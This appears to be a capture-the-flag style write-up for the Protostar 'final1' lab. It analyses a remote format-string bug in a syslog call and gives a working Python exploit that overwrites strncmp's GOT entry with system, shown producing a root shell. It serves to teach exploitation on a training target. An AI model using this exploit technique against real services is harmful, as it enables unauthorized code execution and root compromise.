Protostar 0x16 - Final1

Prev: 0x15 - Final0

This level is a remote format string exploit with a little twist - the vulnerability here will be much less obvious than in prior format string exploit exercises.



Let's start by analyzing the source code. First, there are no surprises in "main," and we can see that it operates in the same way as before. This time, however, it calls two new functions: "getipport" and "parser."

"getipport" uses the "getpeername" function to obtain our IP address and port, and then store those via "sprintf" into a formatted string within the 64-byte "hostname" buffer.

Then, "parser" comes in to read our input in a forever loop via fgets, printing "[final1] $" each time and removing a couple whitespace characters via a custom "trim" function before actually parsing our input. If we enter "username " and then some other input, that additional input is copied into a 128-byte "username" buffer. If we enter "login " plus some input, the program first checks to see whether we've entered a username and, if we have, it passes our extra input as the sole "pw" (likely "password") argument for a "logit" function.

Finally, checking "logit," we can see that it declares a 512-byte buffer called "buf" and fills it using a formatted string via "snprintf." This formatted string contains data from "hostname," "username," and "password," as is passed into "syslog."

Per the "syslog" man page, this function is part of family of functions that send messages to the system logger. "syslog" is called using "void syslog(int priority, const char *format, ...);" and is summarized below:


We can see that the "priority" argument is passed into "syslog" by ORing "LOG_USER" and "LOG_DEBUG," which we can read about on the "syslog" man page, and we can see that "buf" (which contains our "hostname," "username," and "password") is passed in as the "format" argument. However, we know from previous exercises that this is not proper practice! Passing in a buffer of user input should be done via a conversion character such as "%s" for a string - it should never be passed in directly! This means that we should be able to pass in our own conversion characters to pop values from the stack.

The man page even warns us as much:


Before writing our Python script, let's first test our theory by quickly sending some input using "nc," or "netcat."


$ nc localhost 2994
[final1] $ username AAAA %x %x %x %x %x %x %x %x
[final1] $ login %x %x %x %x %x %x %x %x
login failed
[final1] $ ^C


Now, using the "tail" command, we can print the end of the syslog file:


$ tail /var/log/syslog
Jan 25 08:15:29 (none) kernel: [150182.049572] usb 2-2.1: new full speed USB device using uhci_hcd and address 26
Jan 25 08:15:29 (none) kernel: [150182.470650] usb 2-2.1: New USB device found, idVendor=0e0f, ...
Jan 25 08:17:12 (none) final1: Login from 127.0.0.1:46924 as [AAAA 8049ee4 804a2a0 804a220 bffffbd6 b7fd7ff4 bffffa28 69676f4c 7266206e] with password [31206d6f 302e3732 312e302e 3936343a 61203432 415b2073 20414141 25207825]


It worked as expected - the %x modifiers passed into the "format" argument of "syslog" were treated as legitimate modifiers, and so the function is popping values off of the stack. And what's more, we can see that after passing in somewhere between 14 and 15 %x modifiers, we reach the start of our input, which is "AAAA."

Unfortunately, though, it's not aligned, so we'll need to pad our input with another byte to get it correct (don't forget the space after "login"):


$ nc localhost 2994
[final1] $ username BAAAA %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x
[final1] $ login
login failed
[final1] $ ^C
$ tail /var/log/syslog
...
Jan 25 08:29:35 (none) final1: Login from 127.0.0.1:46925 as [BAAAA 8049ee4 804a2a0 804a220 bffffbd6 b7fd7ff4 bffffa28 69676f4c 7266206e 31206d6f 302e3732 312e302e 3936343a 61203532 425b2073 41414141 ] with password []


Great, after an initial one byte of padding we know that we are able to utilize the next four bytes by referencing the 15th "argument." Now, let's prep for our arbitrary write. What should our target be?

We may want to provide some shellcode using our buffer and then overwrite a stack return address with the address of our shellcode, but as we saw in the last level, this can be a messy even with a large buffer, and would certainly be hellish with a buffer of only 128 bytes per line. This means that we would be working with a small NOP slide which would require us to be very precise. Additionally, at some point we must acknowledge some of the more modern limitations that we've tiptoed around thus far, and chiefly among them is a stack that is not executable.

So, what other options do we have? Recall from our Stack6 exercise that, when the stack was not a valid memory segment for us to return into, we instead returned into the shared libc library. More specifically, we returned into "system" and provided "/bin/sh" as the argument. We could do something similar here.

However, we may want to do it a bit differently. In the Stack6 level, we wrote two addresses: the first was the address of system, which overwrote a return address, and the second was the address of a "/bin/sh" string. The means we would need to perform likely 4 separate writes, with one representing one half of each address as we did in Format3 and Format4 so as to avoid printing ~0xb7000000ish whitespace padding characters.

Let's consider crafting a write to the Global Offset Table (GOT) as we did with our Heap3 exercise. The Global Offset Table contains addresses of libc functions that are linked at runtime and, as a result, is writable. If we overwrite the address of a libc function with the address of "system," "system" will be called instead of the original function.

Now, we just need to determine which libc function address we want to overwrite. There are two candidates within the ever-looping "parser" function: "printf" and "strncmp," and both are called once input is provided. However, if we check the first argument of "strncmp" we see "line," which is our input buffer. Thus, if we overwrote the address of "strncmp" in the GOT with the address of "system," whatever input we provide afterwards will be the first argument used! We could execute anything - including "/bin/sh" - simply by typing it in!

Let's now load the program in gdb so we can grab these addresses. Don't forget to break at the start of "main" so we can run the program and force it to link the libc functions/


$ gdb /opt/protostar/bin/final1
GNU gdb (GDB) 7.0.1-debian
...
Reading symbols from /opt/protostar/bin/final1...done.
(gdb) break *main
Breakpoint 1 at 0x8049ab9: file final1/final1.c, line 68.
(gdb) r
Starting program: /opt/protostar/bin/final1
...
(gdb) x system
0xb7ecffb0 <__libc_system>:     0x890cec83
(gdb) disas parser
Dump of assembler code for function parser:
...
0x0804997f <parser+66>: call   0x8048d9c <strncmp@plt>
...
(gdb) x/i 0x8048d9c
0x8048d9c <strncmp@plt>:        jmp    *0x804a1a8


Excellent - we were able to obtain both the address of "system" and the address of "strncmp" in the GOT. We can now begin crafting our exploit, but remember: since we write 4 bytes at a time, we need to write right-to-left. And, since the left half of the address is larger, we'll write a 5-digit number and the most significant byte (0x01) will overflow the bounds of the address and not be considered. A diagram is below:


32-bit|        |
      |  0xffb0|
 + 0x01b7ec    |
 ---------------
    0x1b7ecffb0|
32-bit|b7ecffb0|


Here is our exploit. Once again, I've structured the code this way for readability purposes, which is why it is so verbose:


import socket
import struct

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('localhost', 2994))

#system = 0xb7ecffb0
strncmp1 = struct.pack("<I", 0x804a1a8) #least-significant half of strncmp
strncmp2 = struct.pack("<I", 0x804a1aa) #most-significant half of strncmp

pad_to_ffb0 = "%65416d"
write1 = "%15$n" #strncmp1 is the 15th argument
pad_to_1b7ec = "%47164d"
write2 = "%16$n" #strncmp2 is the 16th argument

payload = strncmp1 + strncmp2 + pad_to_ffb0 + write1 + pad_to_1b7ec + write2

s.send("username " + "B" + payload + "\n")
s.send("login " + "\n")
s.send(raw_input()) #no \n character, so we keep the program running


Finding the proper padding can be a tiring process of trial and error in which we examine the GOT "strncmp" entry in each core dump, but if we run the above program, we can see that we've done it! Or at least, we don't have a core dump... but how can we confirm the address is correct?

Well, we know that "final1" is always running, and when we connect via socket, it creates a child process of the same name. So, if we find the process id of the child process, we can debug it while it's running. To do this, we'll need to find the pid of the parent process, run our Python script to create the child process, and then connect to the VM in a second terminal to check that child pid and open in gdb.

Original terminal:

$ pidof final1
1710
$ python final1.py


New terminal:

$ pidof final1
12375 1710
$ gdb --pid 12375
GNU gdb (GDB) 7.0.1-debian
...
Loaded symbols for /lib/ld-linux.so.2
(gdb) x/x 0x804a1a8
0x804a1a8 <_GLOBAL_OFFSET_TABLE_+188>:  0xb7ecffb0


Confirmed - we've overwritten the address of "strncmp" with the address of "system!"

Now, we can amend the end of our Python script to run a loop, sending commands using our input:


[omitting first section]
s.recv(1024)
s.send("username " + "B" + payload + "\n")
s.recv(1024)
s.send("login " + "\n")
s.recv(1024)

while True:
        s.send(raw_input() + "\n")
        s.recv(1024)
        print s.recv(1024)


When we run it:


# python final1.py
whoami
root

id
uid=0(root) gid=0(root) groups=0(root)


This is too cool!

Prev: 0x15 - Final0